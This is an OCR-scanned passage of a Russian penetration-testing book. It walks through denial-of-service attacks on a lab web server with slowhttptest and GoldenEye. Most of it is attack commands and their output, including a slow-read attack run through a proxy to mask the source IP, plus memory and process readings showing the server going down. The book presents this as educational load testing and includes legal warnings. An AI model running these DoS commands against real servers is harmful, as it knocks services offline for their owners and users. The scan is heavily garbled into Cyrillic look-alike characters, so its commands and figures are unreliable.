
5 Наг есі 

ЬиРРегв 

сасНес! 

Мет: 1012156 

651984 

360172 

9912 

37960 

476428 

-/+ ЬиРРегв/сасНе: 

137596 

874560 




Бѵѵар: 2068476 

0 

2068476 




гооШл'еЬКаге-ОеЬі ап :~# -Ргее 





РоРаІ 

ивесі 

Ргее 

вНагес! 

ЬиРРегв 

сасНеЬ 

Мет: 1012156 

828352 

183804 

9912 

37968 

476428 

-/+ ЬиРРегв/сасНе: 

313956 

698200 




Бѵѵар: 2068476 

0 

2068476 




гоо*@'л'еЬ'л'аге-ОеЬі ап :~# -ргее 





РоРаІ 

ивесі 

Ргее 

вНаг есі 

ЬиРРегв 

сасНеЬ 

Мет: 1012156 

845908 

166248 

9912 

37968 

476428 

-/+ ЬиРРегв/сасНе: 

331512 

680644 




Бѵѵар: 2068476 

0 

2068476 




гооР@Ѵѵ'еЬѴѵ'аге-ОеЬі ап :~# 

■ргее 





РоРаІ 

ивесі 

Ргее 

вНаг есі 

ЬиРРегв 

сасИесі 

Мет: 1012156 

845988 

166168 

9912 

37968 

476428 

-/+ ЬиРРегв/сасНе: 

331592 

680564 




Бѵѵар: 2068476 

0 

2068476 




гооКа’л'еЬ'л'аге-ЭеЬт ап :~# -Ргее 





РоРаІ 

ивесі 

Ргее 

вНагесІ 

ЬиРРегв 

сасНеЬ 

Мет: 1012156 

846084 

166072 

9912 

37968 

476428 

-/+ ЬиРРегв/сасНе: 

331688 

680468 




Бѵѵар: 2068476 

0 

2068476 




гооР@.Ѵѵ'еЬѴі'аге-0еЬіап | 






Пример использования в режиме зіоѵѵ Иеасіегз а.к. а. ЗІоѵѵІогіз: 


1| 

зІоѵѵЫірІезІ: -с 1000 -Н -і 10 -г 200 -1 СЕТ -и ЫірУ/ІЭг.ІбВ.І.ЗУ/іпРо.рНр -х 24 -р 3 

Тоже самое, но график сохраняется в файл: 

1| 

зіоѵѵііітріеві: -с 1000 -И -§ -о ту_НеасІег_5І:а1:5 -і 10 -г 200 -1 СЕТ -и 
Ы:1:р://192.168.1.37/іп1 : о.рІір -х 24 -р 3 


Всё очень похоже: сервер лёг и больше не поднимался: 


Теві рагатеіегз 

Тезі Туре ЗЮѴѴ НЕАОЕВЗ 

МшпЬег о! соппеоікм» 1000 

ѴегЬ 0ЕТ 

СопіепІ-1_епдіЬ Ьеасіег ѵаіие 4096 
Ехіга сЫа тах ІепдіЬ 52 

Іпіегѵаі Ьеіѵѵееп іоііоѵѵ ир сіаіа 1 0 зесопФз 
Соппесііопз рег зесопсіз 200 
Тітеоиі Іог ргоЬе соппесііоп 3 
Тагдеі Іез» сіигаіюп 240 зесопсіз 

Узіпд ргоху по ргоху 


Тезі гезиііз адаіпзі ІіПр://192.168.і.37ЛпТо.рІір 


800 


а. 

с 

с: 

О 

О 


600 

400 

200 



■ СІозесІ 

■ Репсііпд 

■ Соппесіесі 

■ Зѳгѵісе 
аѵаіІаЫѳ 
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X 

гооШМеЬѴі'аге-ЭеЬі ап :~# 

Тгее 





ТоТаІ 

изесі 

Тгее 

зНагесІ 

ЬиТТегз 

сасНесі 

Мет: 1012156 

660932 

351224 

9912 

38188 

476528 

-/+ ЬиТТегз/сасНе: 

146216 

865940 




5\ѵар : 2068476 

0 

2068476 




гооТ@МеЬМ'аге-0еЬі ап 

Тгее 





ТоТаІ 

изесі 

Тгее 

зНагесі 

ЬиТТегз 

сасНесі 

Мет: 1012156 

671284 

340872 

9912 

38188 

476528 

-/+ ЬиТТегз/сасНе: 

156568 

855588 




5«ар: 2068476 

0 

2068476 




гооТ@МеЬ'л’аге-ОеЬіап Тгее 





ТоТаІ 

изесі 

Тгее 

зНагесі 

ЬиТТегз 

сасНесі 

Мет: 1012156 

744924 

267232 

9912 

38196 

476528 

-/+ ЬиТТегз/сасНе: 

230200 

781956 




5кар: 2068476 

0 

2068476 




гооТ@МеЬМаге-ОеЬі ап :~# 

Тгее 





ТоТаІ 

изесі 

Тгее 

зНагесі 

ЬиТТегз 

сасНесі 

Мет: 1012156 

753752 

25 8404 

9912 

38196 

476528 

-/+ ЬиТТегз/сасНе: 

239028 

773128 




5«ар: 2068476 

0 

2068476 




гооТ@МеЬКаге-ОеЬт ап :~# 

Тгее 





ТоТаІ 

изесі 

Тгее 

зНагесі 

ЬиТТегз 

сасНесі 

Мет: 1012156 

753992 

258164 

9912 

38196 

476528 

-/+ ЬиТТегз/сасНе: 

239268 

772888 




5ѵѵар: 2068476 

0 

2068476 




гооТ@МеЬМаге-0еЫ ап 

Тгее 





ТоТаІ 

изесі 

Тгее 

зНагесі 

ЬиТТегз 

сасНесі 

Мет: 1012156 

754056 

258100 

9912 

38196 

476528 

-/+ ЬиТТегз/сасНе: 

239332 

772824 




5пар: 2068476 

0 

2068476 




гооТ@МеЬМаге-ОеЬі ап| 






Пример использования в режиме 5Іоѵѵ КеасІ через прокси. 

Здесь х.х.х.х:8080 — это прокси, который используется для доступа к веб-сайту с ІР 
отличного от вашего: 


II 


8Іо\ѵЬПрГе8І -с 1000 -X -г 1000 -\ѵ 10 -у 20 -п 5 -ъ 32 -и ЬПр://192.168.1. 37/іпГо.рЬр -р 5 -1 
350 -е х.х.х.х:8080 


Сервер в нокауте: 


Приложения Переход % (3 ЯЭ ^3 


Файл Правка Вид Поиск Терминал Справка 


ІТНи Эип 18 08:57:46 2015: 1 

зІомПіірТезІ: ѵегзіоп 

1.6 

- №ір$://согіе. доодіе. сот/рАіоѵгііііріезі/ - 

іезі Туре: 

51.0М КЕЛО 

питЬег оТ соппесііопз: 

1000 

11КІ_: 

Ніір://192.168.1.37/іпТо. рНр 

ѵегЬ: 

СЕТ 

гесеіѵе ѵДпсіоѵѵ гапде: 

10 - 20 

ріреііпе 'Гас Іо г: 

1 

геасі гаГе Г гот гесеіѵе ЬиГГег 

32 Ьуіез / 5 вес 

соппесііопз рег зесопсіз: 

1000 

ргоЬе соппесііоп ГітеоиГ: 

5 зесопсіз 

Гезі сіигаііоп: 

350 зесопсіз 

изіпд ргоху: 

по ргоху 

ТНи .Іип 18 08:57:46 2015: 

зіом НТТР іезі зіаіиз оп 45ТІ1 

іпіііаіігіпд: 0 

репсііпд: 660 

соппесіесі: 340 

еггог: 0 

сіозесі: 0 

зегѵісе аѵаіІаЬІе: МО 

1 

зесопсі: 
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гооР@Ѵі'еЬ'п'аге-ОеЬі ап 

•ргее 





РоРаІ 

ивесі 

Ргее 

5Ііагей 

ЬиРРег5 

сасНей 

Мет: 1012156 

654296 

357860 

9912 

38396 

476608 

-/+ ЬиРРег5/сасНе: 

139292 

872864 




5\ѵар: 2068476 

0 

2068476 




гооЫМеМаге-Оеігі ап :~# ■Ргее 





РоРаІ 

изесі 

Ргее 

5Ііагей 

ЬиРРег5 

сасИей 

Мет: 1012156 

682728 

329428 

9912 

38396 

476608 

-/+ ЬиРРег5/сасНе: 

167724 

844432 




5«ар: 2068476 

0 

2068476 




гооІФКеЬ'л'аге-ОеЬі ап :~# -Ргее 





РоРаІ 

изесі 

Ргее 

5Ііагей 

ЬиРРег5 

сасНей 

Мет: 1012156 

793048 

219108 

9912 

38404 

476608 

-/+ ЬиРРег5/сасНе: 

278036 

734120 




5\ѵар: 2068476 

0 

2068476 




гооКаѴі'еЬѴѴаге-ОеЬі ап 

Ргее 





РоРаІ 

из ей 

Ргее 

5Нагей 

ЬиРРег5 

сасИей 

Мет: 1012156 

855084 

157072 

9912 

38404 

476608 

-/+ ЬиРРег5/сасНе: 

340072 

672084 




5ѵѵар: 2068476 

0 

2068476 




гоо1@'й'еЬ'л'аге-0еЬі ап 

•ргее 





ТоТаІ 

145 ей 

Ргее 

5Ііагей 

ЬиРРег5 

сасНей 

Мет: 1012156 

855100 

157056 

9912 

38404 

476608 

-/+ ЬиТТегБ/сасИе: 

340088 

672068 




5«ар: 2068476 

0 

2068476 




гооТ®л'еЬКаге-ОеЬі ап 

Ргее 





ТоТаІ 

ьі5ей 

Ргее 

5Ііагей 

ЬиРРег5 

сасНей 

Мет: 1012156 

855228 

156928 

9912 

38404 

476608 

-/+ ЬиТТегБ/сасИе: 

340216 

671940 




5«ар: 2068476 

0 

2068476 




гооТ@'л , еЬ І л , аге-0еЬі ап 

Ргее 





ТоТаІ 

и 5 ей 

Ргее 

5Ііагей 

ЬиРРег5 

сасНей 

Мет: 1012156 

855164 

156992 

9912 

38404 

476608 

-/+ ЬиТТегз/сасИе: 

340152 

672004 




5\ѵар: 2068476 

0 

2068476 




гоо1@-'л'еЬѴі'аге-0еЬі ап | 






Вывод по БІоѵѵНТТРТезІ 

В зависимости от выбранного уровня детальности, вывод может быть как простым в 
виде генерируемых каждый 5 секунд сообщений, показывающих статус соединений 
(это при уровне 1), так и полным дампом трафика (при уровне детальности 4). 

-§ опция означает создание файла С5Ѵ, а также интерактивного НТМІ., основанного на 
инструментах 0оо§1е СЬагТ. 

Приведённые выше скриншоты показывают состояние соединений и доступность 
сервера на различных этапах времени, а также дают общую картину поведения 
конкретного сервера под конкретной нагрузкой во время заданного временного 
интервала. 

Файл С5Ѵ может быть полезен в качестве источника для вашего любимого инструмента 
по работе с данными, среди них могут быть М5 ЕхсеІ, і\А/огк ІМитЬегз или Соо§Іе Эосз. 

Последнее сообщение, которые выводит программа при закрытии, этот статус 
завершения, они могут быть следующими: 

• "Ніі іезі: ііте Іітіі" программа достигла лимита времени, заданного аргументом 
-I 

• "N 0 ореп соппесбопз Іе^І" пир закрыл все соединения 

• "Саппов езТаЫізЬ соппесііоп" не было установлено соединений за время N 
секунд теста, где N или величина аргумента -і, или 10 (значение по умолчанию). 
Это может случиться если нет маршрута к удалённому хосту или пир лёг. 
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• "Соппесбоп геТизесГ удалённый сервер не принимает соединения (может быть 
только от тебя? Попробуйте использовать прокси) на определённом порту 

• "СапсеІІесІ Ьу изег" вы нажали СТгІ-С или отправили 5ІСІІМТ каким-либо другим 
образом 

• "ІІпехресІесІ еггог" не должно никогда случаться. 

Примеры вывода реальных тестов ЗІоѵѵНТТРТезТ 

Примеры уже даны чуть выше, давайте сделаем ещё один. Как и в предыдущие разы у 
меня доступ к атакующей и атакуемой машинам, поэтому есть возможность выполнить 
замеры на обоих. В этот раз посчитаем количество соединений. 

Со стороны атакующего 


Итак, я собрал статистику для атаки на ИіІр://192. 168.1.37 с 1000 соединениями. 


1 


зіоѵѵіінріезі: -с 1000 -В -§ -о ту_Ьосіу_5І:а1:5 -і 110 -г 200 -5 8192 -I РАКЕѴЕКВ -и 
Ыі;р://192.168.1.37/іпТо.рНр -х 10 -р 3 


ТЬи Лип 18 09:26:12 2015: 


зІомЬТТрТезТ ѵегзіоп 1.6 


- ЬТТрз: //сосіе. доодіе. сот/р/зІомЫТрТезТ/ - 

ТезТ Туре: 

5ЮМ ВОРУ 

питЬег оТ соппесТіопз: 

1000 

ІЛВІ_: 

ЬТТр://192.168.1.37/іпТо.рЬр 

ѵегЬ: 

ЕАКЕѴЕКВ 

СопТепТ -1_епдТЬ Тіеасіег ѵаіиѳ: 

8192 

ТоПом ир сІаТа тах зіге: 

22 

іпТегѵа! ЬеТмееп Тоііом ир сІаТа: 

110 весопсіз 

соппесТіопз рег зесопсіз: 

200 

ргоЬе соппесТіоп ТішеоиТ: 

3 зесопсіз 

ТезТ сІигаТіоп: 

240 зесопсіз 

изіпд ргоху: 

по ргоху 

ТМи Лип 18 09:26:12 2015: 


зіом НИР ТезТ зТаТиз оп 1 ТЬ зесопсі: 

іпітіаіігіпд: 0 

репсііпд: 705 

соппесТесІ: 295 

еггог: 0 

сіозесі: 0 

зегѵісе аѵаіІаЬІе: 
л СТЬи Лип 18 09:26:13 2015: 

ТезТ епсіесі оп ІѲТІт зесопсі 

Е іт зТаТиз: СапсеІІесІ Ьу изег 


С5ѵ герогТ і - 1 Т туЬосІузТаТз. сзѵ 

ИТМЬ герогТ заѵесі То ту ЬосІузТаТз. ЬТтІ 

гооТ@ИеЫл!аге-КаІі:~# [і 
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Со стороны сервера-жертвы 


1| 

гооІкЭѴѴеЬѴѴаге-ОеЬіап:"'# пеТзТаІ | §гер МТр | ѵѵс -1 

21 

111 


С 


гоо1:@'л'еЬ'л'аге-0еЬіап :~# пеЪвТаТ | дгер ІтЕТр | ѵѵс -1 
О 

гооТ@л'еЬ'л'аге-ОеЬіап :~# пеТаТаТ | дгер НТТр | «с -1 
111 

гооШл'еЫѵ'аге-ОеЬіап :~# | 


Показатели не получается снять во время проведения атаки, т. к. по 55Н сервер также 
перестаёт отвечать. Общее число НМр соединений подпрыгнуло до 111 в первые 10 
секунд. 

Этого более чем достаточно чтобы положить сервер (это могут быть большинство 
маленьких серверов или ѴР5) . 

Рекомендации по тестированию Оо5 

• 0о5 атака чужих серверов без разрешения, особенно успешная, является 
преступлением, в том числе в РФ 

• При атаке на локалхост (особенно на маломощных и виртуальных машинах), 
тормоза сервера могут быть связаны не с 0о5 атакой, а с тем, что сама 
программа ЗІоѵѵНТТРТезІ: заняла все ресурсы и сама по себе тормозит 
компьютер. 

• Если при атаке на удалённый хост программа пишет вам, что он недоступен, а 
при попытке открыть страницу веб-сайта в браузере действительно ничего не 
открывается, то не спешите радоваться. Вполне возможно, сто сработала защита 
от ЭоЗ атаки и ваш ІР (временно) заблокирован. Для всех остальных сайт 
прекрасно открывается. Можете убедиться в этом сами, используя любой 
анонимайзер или прокси или подключившись через другого Интернет- 
провайдера. 

Заключение 

Это можно делать с ѴѴіпсІоѵѵз, Ыпих и даже с Мае. Если вы запустите несколько йо5 
инструментов, таких как СоІсІепЕуе, Нріп§3 на один веб-сервер, то тогда его будет очень 
просто выбить. Общие советы по защите от 0о5 будут в следующей статье (да, 
следующая статья опять про стресс-тест сети). А о правильной настройке сервера, в том 
числе о модуле, защищающим именно от слоу-атак, будет рассказано в ближайшее 
время. 


Глава 30. Стресс-тест сети: Ро$ веб-сайта в Каіі Ыпих с СоІсІепЕуе 

На страницах ѴѴеЬѴѴаге.Ыг и в предыдущих главах уже говорилось об инструментах 
0о5, которые могут сильно нагрузить серверы НТТР, чтобы парализовать их работу из- 
за исчерпания пула ресурсов. СоІсІепЕуе — это ещё один, со своими особенностями, 
который может положить сервер за 30 секунд, в зависимости от того, насколько велик 
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пул его памяти. Конечно, он не работает на защищённых серверах и серверах за 
правильно настроенными ѴѴАР, ЮЗ. Но это отличный инструмент для тестирования 
вашего веб-сервера на повышенную нагрузку. А на основании полученных результатов 
можно изменить правила ірІаЫез/файерволов для увеличения устойчивости и 
сопротивляемости к негативным факторам. 

Подробности об инструменте ОоІбепЕуе: 

• Название утилиты: ОоИепЕуе 

• Автор: Іап БеісМ 

• Веб-сайт: НіТрУ/ѵѵгооі.огй/ 

Из поста автора ОоИепЕуе: 

1. Этот инструмент предназначен только для целей исследования и любое другое 
вредоносное его использование запрещено. 

2. ОоИепЕуе — это приложение на питоне для ТОЛЬКО ЦЕЛЕЙ ТЕСТИРОВАНИЯ 
БЕЗОПАСНОСТИ! 

3. ОоИепЕуе это инструмент тестирования НТТР ЭоЗ. 

4. Эксплуатируемый вектор атаки: НТТР Кеер АІіѵе + ІМоСасНе 

Типы йоБ или ОйоБ атак 

Давайте пройдёмся по самой базовой информации об атаках ЭоЗ или. ОйоЗ. Обычно 
выделяют три вида ОоЗ и 00о5 атак: 

1. йоЗ и 00о5 атаки уровня приложений 

2. ОоЗ и 00о5 атаки уровня протокола 

3. ОоЗ и йОоЗ атаки насыщения полосы пропускания 

йоБ и ОйоБ атаки уровня приложений 

йоЗ и 00о5 атаки уровня приложений — это атаки, которые нацелены на \А/іпсіохл/з, 
АрасЬе, ОрепВЗй или другое программное обеспечение для выполнения атаки и краха 
сервера. 

йоБ и ййоБ атаки уровня протокола 

ЭоЗ и ОЭоЗ атаки уровня протокола — это атаки на уровне протокола. Эта категория 
включает ЗупЛоосІ, Ріп§ оі" Оеаііі и другие. 

ОоБ и ййоБ атаки насыщения полосы пропускания 

Этот тип атак включает ІСМР-флуд, ІЮР-флуд и другие типы флуда, осуществляемые 
через поддельные пакеты. 

Слова ОоЗ и ЭОоЗ близки по значению. Когда атака ведётся с одной машины, обычно 
говорят о йоЗ атаке. При большом количестве атакующих из ботнета (или группы) 
говорят о 00о5 атаке. Об этих атаках доступно много информации, но не важна, какого 
типа эта атака, т. к. они все одинаково вредны для сервера/сети. 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


187 









Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Загрузка СоІсіепЕуе 

Сторонние программы, установленные не из репозитория, я собираю в каталоге ~/орТ. 
Если у вас нет каталога для сторонних программ, то создайте его и перейдите туда: 


1| 

тксііг орі 

21 

сс) орі 


Следующая большая команда создаст каталог, загрузит туда последнюю версию 
СоІсіепЕуе, распакует архив и сразу запустит СоІсіепЕуе (покажет справку по 
программе): 


1 


тксііг СоІсіепЕуе && сс) СоІсіепЕуе && \л/§еТ 

Іі11р5://§і{ЬиЬ.сот/]5еіс)І/СоІс)епЕуе/агсІііѵе/та5І:ег.2Ір && итір тазіег.іір && сс) 
СоИепЕуе-тазІег/ && ,/§оІс)епеуе.ру 


Если вам хочется всё сделать самому — постепенно, то продолжаем. Для начала 
создаём каталог СоІсіепЕуе, переходим туда и скачиваем архив с программой: 


1| 

гоо):@\/\/еЬ\Л/аге-КаІІ:~/ор1:# тксііг СоІсіепЕуе 

21 

гоо1@ууеЬ\Л/аге-КаП:~/ор1:# сс) СоІсіепЕуе 

3| 

гоо1@\Л/еЬ\Л/аге-КаІІ:~/ор1:/СоІсІепЕуе# ѵѵ^еі: 
Іі11р5://§і{ЬиЬ.сот/І5еіс)І/СоІс)епЕуе/агсЫѵе/та5І:ег.2Ір 


гоо*(§)ѴѴеЬѴѴаге-КаІі: *7ор*/СоІ<іепЕуе 

Файл Правка Вид Поиск Терминал Справка 


гооСйКеЬ’л'агс-КлІі :~/орТ# тксііг СоІсіепЕуе 
гсіоіі‘ГЛеІ)Ѵ.'аге-К.і і :~/орТ# ссі СоІсіепЕуе 

го оI(■іі:--І 1 .іге-К.аІ.І :~/орі/СоІсіепЕуе# мдеі Ьіірз://дііЬиЬ.сот/ізеісІІ/СоІсІепЕуе/агсГііѵе/тазіег.гір 

- -2015-06-18 12:40:46-- Иігіірз: //діСЬиЬ .сот/] 5еісП./6оТ.сІепЕуе/агсЫѵе/таз1:ег.2ір 
Распознаётся дііГіиЬ.сот (дііИиЬ .сот) .. . 192.30.252.129 

Подключение к дііНиЬ .сот (дііНиЬ .сот) 1192.30.252.129|:443. . . соединение установлено. 

НТТР-запрос отправлен. Ожидание ответа... 302 РоипсІ 

Адрес : Ьіірз ://сосІеІоасІ .дііЬиЬ .сот/] зеісП/бо'ІсІепЕуе/гір/тазіег [переход] 

- -2015-06-18 12:40:47-- ЫгТрз://сосІеТоасІ .дііИиЬ .сот/] зеІсП/боТсІепЕуе/гір/тазІіег 
Распознаётся сосіеіоасі.дііИиЬ .сот (сос1е1оас1.дИ:ИиЬ.сот) . . . 192.30.252.147 

Подключение к сосІеІоаД .дііНиЬ .сот (сосіеіоасі.дііЬиЬ .сот) 1192.30.252.147] :443. .. соединение установлено. 
НТТР-запрос отправлен. Ожидание ответа... 200 ОК 
Длина: 104309 (1Ѳ2К) [арріісаііоп/гір] 

Сохранение в каталог: ««тазіег.гір»» . 

1 ѲѲ% [=================================================================>] 104 309 122К/3 за 0,8з 

2015-06-18 12:40:50 (122 КВ/з) - «тазіег.гір» заѵесі [104309/104309] 
і ооТ(і)НеІ .л - і :~/орС/СоІ()епЕуе# | 


После скачивания распаковываем файл архива тазіег.гір. 


1 


ипгір тазіег.гір 
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гооТ@ИеЬИаге-КаІі:~/орТ/СоІ<1епЕуе# ипгір тазіег.гір 
|АгсТііѵе: тазіег.гір 

7а38Те93Ѳе2сЬ72399е1ае46есІѲ8Ь6105825е746 
сгѳаііпд: СоІсІепЕуе-тазТег/ 
іпТІаііпд: СоТсІепЕуе-тазТег/КЕАРМЕ.тсі 
іпТІаііпд: СоІсІепЕуе-тазТег/доІсІепеуе .ру 
сгеаііпд: СоІсІепЕуѳ-тазТег/гез/ 
с геаііпд: СоІсІепЕуе-тазТег/гез/ІізІіз/ 
с геаііпд: СоІсІепЕуе-тазіег/гез/Т.ізіз/изегадепіз/ 
іпТІаііпд: ОоІсІепЕуе-тазіег/гез/'Іізіз/изегадепіз/апсІгоісІ .іхі 
іпТІаііпд: СоІсІепЕуе-тазіег/гез/Іізіз/изегадепіз/Ьгоѵу/зегз .іхі 
ІпТІаііпд: СоТ.сІепЕуе-тазіег/гез/Іізіз/изегадепіз/с'ІоисІр'ІаіТотіз .іхі 
іпТІаііпд: СоІсІепЕуе-тазТег/гез/ТізІіз/изегадепТз/с гаѵЛе гз .іхі 
іпТІаііпд: СоІсІепЕуе-тазіег/гез/Іізіз/изегадепіз/ТеесІгеасІегз .іхі 
ІпТІаііпд: СоІсІепЕуе-тазіѳг/гез/'Іізіз/изегадепіз/ірасІ .іхі 
ІпТІаііпд: СоІсІепЕуе-тазіег/гез/'Іізіз/изегадепіз/ірТіопе .іхі 
іпТІаііпд: СоІсІепЕуе-тазіег/гез/'Іізіз/изегадепіз/'І.іЬгагіез .іхі 
іпТІаііпд: СоІсІепЕуе-тазіег/гез/Іізіз/изегадепіз/ІіпксТіескегз .іхі 
іпТІаііпд: СоІсІепЕуе-тазіѳг/гез/'Іізіз/изегадепіз/оіТіегз .іхі 
ІпТІаііпд: СоІсіепЕуе-тазіег/гез/Іізіз/изегадепіз/ѵаІісІаіогз .іхі 
ІпТІаІііпд: СоІсІепЕуе-тазіег/гез/Т.ізІіз/изегадепІіз/гуІ: гах-ЬгомзегісІ .іхі 
сгеаііпд: СоІсІепЕуе-тазТег/иІііІ/ 
іпТІаііпд: СоІсІепЕуе-тазіег/иіГІ/деіиаз .ру 
г и оЦа'л’е I А іа ге - Каіі : ~/орі/СоІсіепЕу е# | 


Теперь у нас появился каталог СоІсІепЕуе-тазіег, переходим туда и проверяем его 
содержимое: 


1| 

ІЗ 

21 

ссі СоІсіепЕуе-тазіег/ 

3| 

ІЗ 


Іі:~/ор1;/СоІ()епЕуе# 1з 
СоІсіепЕуе-тазТег тазіег.гір 

1:@ЫеЬИаге-КаІі:~/ор1:/СоІ()епЕуе# ссі ОоІсІепЕуе-тазІгег/ 
С@ЫеЬИаге-КаІі:~/ор1:/СоІсІепЕуе/СоІсІепЕуе-гаа5Еег# Із 
доісіепеуе. ру КЕАОМЕ.тсІ гее иііі 

С@МеЬИаге-КаІі:~/орг/ЬоІ()епЕуе/СоІ()епЕуе-та5Еег# | 


Запуск боІсІепЕуе - досилл веб-сайт 

Запуск очень прост, делается это так: 


1 


,/§оІсІепеуе.ру 


Программа показывает нам свою справку: 


гооТдИеЬМаге- 

КаЕі:~/ор1:/СоІ(іепЕуе/СоІсіепЕуе-гаа5І:ег# ./доісіепеуе.ру 



Ріеазе зирріу аі Іеазі: ІЬе 

ііга. 



ЗоІсІепЕуе м2. 

1 Ьу .Іап ЗѳісІІ 

«дзеісГКамгооІ: ,огд> 



ІІЗАСЕ: ./доісіепеуе .ру <иг!> [0РТІ0ІЧ5] 



0РТІ0ЫЗ: 





Ріад 

йезс гірііоп 

ОеГаиН 


-и. 

--изегадепіз 

Еііе МІ1И изег-адепіз Іо изе 

(сІеГаиН: 

гапсіотіу 

депегаіесі) 





-\Ы, 

- -мо гке гз 

кІитЬег о Г сопсиггѳпі могкегз 

(йеГаиН: 

10) 

-5/ 

--зоскеіз 

АІитЬег оГ сопсиггепі зоскеіз 

(сІеГаиІЕ: 

500) 

-ш. 

--теІЬосІ 

НТТР МеІНосІ Іо изе ' деТ' о г 'роз!' о г 'гапсіот' 

(сІеГаиН: 

деі) 

-сі. 

- -сІеЬид 

ЕпаЫе ОѳЬид Мосіе [тоге ѵегЬозе оиіриі:] 

(сІеГаиІЕ: 

Раізе) 

-И, 

- -Иеір 

ЗНомз ІНіз Ьеір 



гоо1:(аНеЬМаге-КаІі:~/ор1:/СоІ(іепЕуе/СоІ(іепЕуе-та5І:ег# | 
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Необходимо осведомлять пользователей о расписании тестирования и возможных 
перебоях в работе. Поскольку часто результатом симуляции атаки является остановка 
работы. 

Ну и все другие предупреждения: вы не должны тестировать (симулировать атаку) 
других без их разрешения. Поскольку в случае причинения вреда, вы можете быть 
привлечены к ответственности в соответствии с законодательством. 

Данная информация размещена в образовательных целях. Для тестирования своих 
серверов, для анализа качества их настройки и разработки мер противодействия 


атакам 


Запуск слегка различается от используемой вами ОС: 

1| 

гоо1@\Л/еЬ\Л/аге-КаІІ:~/ор1:/СоІс1епЕуе/СоІсІепЕуе-та5І:ег# ,/§оІсіепеуе.ру 

ЫТ р ://\л/ѵѵ\л/ . §о 1 сі е п еу еіезіз ііе. со т/ 

(или) 

1| 

5ііс]о ,/§оІсІепеуе.ру Ьі1р://ѵѵѵѵ\/ѵ.§оІ(1епеуе1е5І5І1е.сот/ 

(или) 

1| 

руіііоп §оІсІепеуе.ру ЫірУ/ѵѵѵѵѵѵ.ёоІсІепеуеІеБІБІІе.сот/ 


В зависимости оттого, где вы сохранили файлы, подредактируйте ваш путь и команду. 


Далее тесты боІсІепЕуе: 

Следить за состоянием сервера я буду командой Іор: 


С 


Іор - 17:02:06 ир 5:58, 2 изегз, Іоасі аѵегаде: 0,06, 0,88, 0,62 

Тазкз: 82 ТоТаІ , 1 гиппіпд, 81 зіееріпд, О зіорресі, О готЬіе 

%Сри(з): 0,0 из, 0,3 зу, 0,0 пі, 99,3 іЗ, 0,0 ѵѵа, 0,0 Ні, 0,3 зт , 0,0 зТ 

КіВ Мет: 1012156 ТоТаІ, 662624 изеЩ 349532 Тгее, 40108 Ьи-рТегз 

Кі В 5*ѵар: 2068476 ІоТаІ, О изеЩ 2068476 Тгее. 478416 сасНесі Мет 


РЮ 


РК 

N1 

VI КТ 

КЕ5 

ЬНК 

5 

9ЙСР11 

яэчвч 

ТІМЕ+ СОНМАМ) 

856 

ГООІ 

20 

0 

82700 

5920 

5068 

5 

0,3 

0,6 

0:01.12 ззИР 

10964 

ГООІ 

20 

0 

23800 

3072 

2412 

К 

0,3 

0,3 

0:00.42 Тор 

1 

ГООІ 

20 

0 

110496 

4664 

3092 

5 

0,0 

0,5 

0:00.96 зузіетсі 

2 

ГООІ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.01 кіНгеасЩ 

3 

ГООІ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.36 кзоТіігдгі/О 

5 

гооТ 

0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 кмогкег/0: ОН 

6 

ГООІ 

20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 кѵѵогкег/и2:0 


Т.е. сервер находится в состоянии простоя, процесс полностью свободен, свободной 
оперативной памяти доступно 350 мегабайт. 

Атака 


і 


,/§оІсІепеуе.ру Ы:1:р://192.168. 1.37/іпТо.рИр 


<аІі:~/ор1:/СоІ(ІепЕуе/СоІі1епЕуе-піа5іег# ./доісіѳпеуѳ .ру Ніір ://192.168.1 ,37/іпГо .рНр 
ОоІсІѳпЕуе ѵ2.1 Ьу .Іап ЗѳісП. <д зѳісГКаѵгооі ,огд> 

Нііііпд меЬзегѵег іп тосіе ' деТ' хя/іТИ 10 могкегз гиппіпд 500 соппесііопз еасЬ. Ніі СТКЬ+С іо сапсеі. 
/ 'ССТИ_+С гесѳіѵесі. КіТЛіпд аП. могкѳгз 
ЗЬиіііпд сіоѵѵп СоІсІѳпЕуе 

гооі@ИеЬНаге-КаІі:-/ор1:/(;оІ(іепЕуе/СоІ()епЕуе-та5І:ег# | 
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Результат 

Можно посмотреть по скриншоту, процессор по-прежнему практически бездействует, 
но количество свободной памяти резко сократилось, увеличилось количество спящих 
процессов. 















:ор - 

17:06:58 

ир 

6:03, 

2 ивегв, Іоасі аѵегаде: 0, 

08, 0 

,42, 0,49 


"азкв: 

: 217 

Іоіаі , 

1 гиппіпд, 215 віееріпд, 


0 віорресі, 

1 готЬіе 

рСри(5): 0,3 ив, 

0,3 ву, 0,0 

пі, 99, 

3 ігі, 

0 

,0 ѵѵа 

, 0, 

0 Ні, 0,0 5І, 0,0 5Т 

;іБ Мет: 

1012156 

ТоТаІ 

, 932380 ивесі 

, 79776 Тгее, 

40508 ЬиТТегв 

:і В 5«ар: 

2068476 

Тоіаі 

9 

0 ивесі 

, 2068476 Тгее. 

479576 сасНесі Мет 

РЮ 

У5ЕК 


РК 

КІЯ 


4871 

ПТуБЯ 1 


20 

0 

558132 

48404 

11084 

5 

1,3 

4,8 

0:08.21 

туБдІа 

856 

гооТ 


20 

0 

82700 

5920 

5068 

5 

0,3 

0,6 

0:01.48 

ввИЦ 

7848 

гооТ 


20 

0 

280712 

27600 

19936 

5 

0,3 

2,7 

0:02.02 

арасНе2 

.1166 

ѵллѵ-сІаТа 

20 

0 

281704 

16700 

8488 

5 

0,3 

1,6 

0:00.07 

арасНе2 

1 

гооТ 


20 

0 

110496 

4664 

3092 

5 

0,0 

0,5 

0:00.96 

вувіетсі 

2 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.01 

кТИгеасіс) 

3 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.42 

квоТіігдсі/О 

5 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

кѵѵогкег/0:0Н 

6 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

кѵ»'огкег/и2 :0 

7 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.60 

гси_всИес) 

8 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

гси_ЬН 

9 

гооТ 


